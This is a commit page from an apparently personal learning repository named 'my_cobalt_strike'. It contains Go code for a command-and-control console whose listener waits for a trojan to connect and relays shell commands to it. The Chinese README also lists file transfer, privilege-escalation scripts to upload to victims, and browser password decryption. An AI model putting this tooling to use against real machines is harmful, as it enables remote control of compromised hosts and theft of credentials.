sangge/my_cobalt_strike
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update readme and go.mod

Browse Source
This commit is contained in:
Smart-SangGe 2022-08-01 11:30:11 +08:00
parent 9e2388622c
commit 5c46423e87
4 changed files with 79 additions and 74 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
.gitlab-ci.yml
View File

@ -2,10 +2,10 @@ variables:
# Package version can only contain numbers (0-9), and dots (.). # Package version can only contain numbers (0-9), and dots (.).
# Must be in the format of X.Y.Z, i.e. should match /\A\d+\.\d+\.\d+\z/ regular expresion. # Must be in the format of X.Y.Z, i.e. should match /\A\d+\.\d+\.\d+\z/ regular expresion.
# See https://docs.gitlab.com/ee/user/packages/generic_packages/#publish-a-package-file # See https://docs.gitlab.com/ee/user/packages/generic_packages/#publish-a-package-file
PACKAGE_VERSION: "1.2.3" PACKAGE_VERSION: "1.2.4"
LINUX_AMD64_BINARY: "console-${PACKAGE_VERSION}" LINUX_AMD64_BINARY: "console-${PACKAGE_VERSION}"
PACKAGE_REGISTRY_URL: "${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/generic/cobalt-strike/${PACKAGE_VERSION}" PACKAGE_REGISTRY_URL: "${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/generic/cobalt-strike/${PACKAGE_VERSION}"
CI_COMMIT_TAG: "1.2.3" CI_COMMIT_TAG: "1.2.4"
stages: stages:
- build - build

9
README.md
View File

@ -20,6 +20,9 @@
- 通讯实现https - 通讯实现https
- 自定义通讯协议 - 自定义通讯协议
### 使用方法
可以使用go run console.go直接运行也可以使用go build console.go编译生产二进制文件。在release中也有编译完成的二进制文件可以直接下载使用。
### 模块化设计思路 ### 模块化设计思路
- 服务端控制台与各功能分离,能由控制台统一控制,也能单独使用。 - 服务端控制台与各功能分离,能由控制台统一控制,也能单独使用。
@ -37,10 +40,14 @@
### 文件上传下载功能 ### 文件上传下载功能
- 下载时利用dd命令将文件分成与缓冲区大小一致的数据块发送当接收到数据大小不一致时则判断传输完成 - 下载时利用dd命令将文件分成与缓冲区大小一致的数据块发送当接收到数据大小不一致时则判断传输完成
- 上传时利用dd命令bs和count参数指定接收文件大小这样就可以通过标准输入流写入文件未测试读写权限问题 - 上传时利用dd命令bs和count参数指定接收文件大小这样就可以通过标准输入流写入文件未测试读写权限问题
- 提供了downloaded目录用来保存下载好的文件
### 提权功能
- 在privsec文件夹中提供了shell脚本和多种架构的二进制文件可辅助提权。上传至客户端后运行即可。
## 参考资料 ## 参考资料
知识点参考https://toothsome-cardamom-46e.notion.site/Go-TCP-Cooolin-4d03a3eaed09446bb501826cbbd6bc22 知识点参考https://toothsome-cardamom-46e.notion.site/Go-TCP-Cooolin-4d03a3eaed09446bb501826cbbd6bc22
语言参考https://pkg.go.dev/ 语言参考https://pkg.go.dev/
提权脚本参考https://github.com/carlospolop/PEASS-ng 提权脚本参考https://github.com/carlospolop/PEASS-ng
提权思路参考book.hacktricks.xyz 提权思路参考:https://book.hacktricks.xyz
浏览器密码解密项目https://github.com/unode/firefox_decrypt 浏览器密码解密项目https://github.com/unode/firefox_decrypt

137
console.go
View File

@ -22,8 +22,6 @@ func main() {
fmt.Println(" \\____|____/ \\____\\___/|_| |_|___/\\___/|_|\\___|") fmt.Println(" \\____|____/ \\____\\___/|_| |_|___/\\___/|_|\\___|")
console() console()
//listener("tcp", 4444)
//dial("tcp", "127.0.0.1", 4444)
} }
type env struct { type env struct {
@ -35,73 +33,6 @@ type env struct {
var env1 env var env1 env
// listener function
func listener(port int) {
// Create a listener
var addr net.TCPAddr
addr.IP = net.IPv4(127, 0, 0, 1)
addr.Port = port
listener, err := net.ListenTCP("tcp", &addr)
if err != nil {
fmt.Println("err = ", err)
return
}
fmt.Printf("Listening on local port %d\n", port)
defer listener.Close()
//var connpool[16] net.TCPConn
//Wait for connection
conn, err := listener.AcceptTCP()
if err != nil {
fmt.Println("err = ", err)
return
}
fmt.Println("木马已经上线")
//defer conn.Close() //Close TCP connetcion
exit := make(chan string, 1)
receive := make(chan int)
sstop := make(chan string)
rstop := make(chan string)
//Get username
conn.Write([]byte("id\n"))
receiver(*conn)
fmt.Print(env1.username + " > ")
go func() {
for {
select {
case <-rstop:
return
default:
<-receive
receiver(*conn)
fmt.Print(env1.username + " > ")
}
}
}()
go func() {
for {
select {
case <-sstop:
return
default:
sender(conn, exit, receive, sstop, rstop)
}
}
}()
exitsignal := <-exit // 2. 尝试从通道中读取内容,若通道为空,则阻塞在此
sstop <- "stop sender"
rstop <- "stop receiver"
fmt.Printf("command: %v\n", exitsignal)
return
}
// 控制台函数 // 控制台函数
func console() { func console() {
@ -202,6 +133,72 @@ func execInput(input string) error {
return cmd.Run() return cmd.Run()
} }
// listener function
func listener(port int) {
// Create a listener
var addr net.TCPAddr
addr.IP = net.IPv4(127, 0, 0, 1)
addr.Port = port
listener, err := net.ListenTCP("tcp", &addr)
if err != nil {
fmt.Println("err = ", err)
return
}
fmt.Printf("Listening on local port %d\n", port)
defer listener.Close()
//var connpool[16] net.TCPConn
//Wait for connection
conn, err := listener.AcceptTCP()
if err != nil {
fmt.Println("err = ", err)
return
}
fmt.Println("木马已经上线")
//defer conn.Close() //Close TCP connetcion
exit := make(chan string, 1)
receive := make(chan int)
sstop := make(chan string)
rstop := make(chan string)
//Get username
conn.Write([]byte("id\n"))
receiver(*conn)
fmt.Print(env1.username + " > ")
go func() {
for {
select {
case <-rstop:
return
default:
<-receive
receiver(*conn)
fmt.Print(env1.username + " > ")
}
}
}()
go func() {
for {
select {
case <-sstop:
return
default:
sender(conn, exit, receive, sstop, rstop)
}
}
}()
exitsignal := <-exit // 2. 尝试从通道中读取内容,若通道为空,则阻塞在此
sstop <- "stop sender"
rstop <- "stop receiver"
fmt.Printf("command: %v\n", exitsignal)
}
func dial(host string, port int) { func dial(host string, port int) {
//处理连接参数 //处理连接参数
var dialaddr net.TCPAddr var dialaddr net.TCPAddr
@ -260,7 +257,6 @@ func dial(host string, port int) {
sstop <- "stop sender" sstop <- "stop sender"
rstop <- "stop receiver" rstop <- "stop receiver"
fmt.Printf("command: %v\n", exitsignal) fmt.Printf("command: %v\n", exitsignal)
return
} }
func sender(conn *net.TCPConn, exit chan string, receive chan int, sstop chan string, rstop chan string) { func sender(conn *net.TCPConn, exit chan string, receive chan int, sstop chan string, rstop chan string) {
@ -370,7 +366,6 @@ func sender(conn *net.TCPConn, exit chan string, receive chan int, sstop chan st
} }
conn.Write([]byte(inp)) conn.Write([]byte(inp))
receive <- 1 receive <- 1
return
} }
func receiver(conn net.TCPConn) { func receiver(conn net.TCPConn) {

3
go.mod Normal file
View File

@ -0,0 +1,3 @@
module console.go
go 1.18